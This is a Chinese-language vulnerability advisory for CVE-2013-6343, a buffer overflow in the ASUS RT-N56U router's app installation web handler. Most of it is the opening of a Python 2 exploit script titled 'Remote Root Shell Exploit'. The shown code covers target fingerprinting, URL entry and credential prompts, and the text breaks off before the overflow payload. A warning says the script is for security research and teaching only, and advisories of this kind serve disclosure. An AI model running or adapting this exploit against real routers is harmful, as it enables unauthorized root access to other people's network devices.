发布日期:2014-01-21
更新日期:2014-01-23
受影响系统:
Asus RT-N56U 3.0.0.4.374_979
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 65046
CVE(CAN) ID: CVE-2013-6343
ASUS RT-N56U是无线宽带路由器。
ASUS RT-N56U 固件版本3.0.0.4.374_979及之前版本在安装新应用时,由路由器Web服务器处理安装进程,安装进程易于受到多个缓冲区溢出漏洞的攻击,可导致攻击者在受影响设备上下文中执行任意代码。
<*来源:Jacob Holcomb
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/env python
from time import sleep
from sys import exit
import urllib2, signal, struct, base64, socket, ssl
# [*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
# [*] Discovered and Reported: October 2013
# [*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE
# [*] Contact: Twitter - @rootHak42
# [*] Software Vendor:
# [*] Exploit/Advisory: ,
# [*] Software: httpd (Listens on TCP/80 and TCP/443)
# [*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
# [*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343
#
# [*] Overview:
# Multiple ASUS routers including the RT-N56U and RT-AC66U have the ability to install
# supplemental applications. This install process is handled by the routers web server,
# and is susceptible to multiple Buffer Overflow attacks.
#
# Vulnerable Web Page: APP_Installation.asp
# Vulnerable HTML Parameters: apps_name, apps_flag
# Vulneralbe Source File: web.c of httpd code
# *Firmware versions prior to the tested version were vulnerable to this attack.
#
def fingerPrint(host, port, netSock):
fprint = ["RT-N56U"]
found = None
print " [*] Preparing to fingerprint the server."
try:
print " [*] Connecting to %s on port %d." % (host, port)
netSock.connect((host, port))
except Exception as error:
print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
exit(0)
try:
print " [*] Sending fingerprint request."
netSock.send("HEAD / HTTP/1.1\r\n\r\n")
netData = netSock.recv(1024)
except Exception as error:
print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
exit(0)
try:
print " [*] Closing network socket.\n"
netSock.close()
except Exception as error:
print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
for item in fprint:
if item in netData:
print " [!!!] Target system found in signature list - Result: %s [!!!]\n" % item
sleep(1)
found = item
if found == None:
print " [!!!] Server banner doesn't match available targets. [!!!]\n"
sleep(1)
exit(0)
else:
return found
def targURL():
while True:
URL = raw_input("\n[*] Please enter the URL of the router. Ex. \n>")
if len(URL) != 0 and URL[0:7] == "http://" or URL[0:8] == "https://":
return URL.lower()
else:
print "\n\n [!!!] Target URL cant be null and must contain or https:// [!!!]\n"
sleep(1)
def creds():
while True:
User = raw_input("\n[*] Please enter the username for the routers HTTP Basic Authentication:\n>")
Pass = raw_input("\n[*] Please enter the password for the supplied username:\n>")
if len(User) != 0:
return User, Pass
else:
print "\n [!!!] Username cant be null [!!!]\n"
sleep(1)
def basicAuth():
auth = None
while auth != "yes" and auth != "no":
auth = raw_input("\n[*] Would you like to use HTTP Basic Authentication? \"yes\" or \"no\"\n>")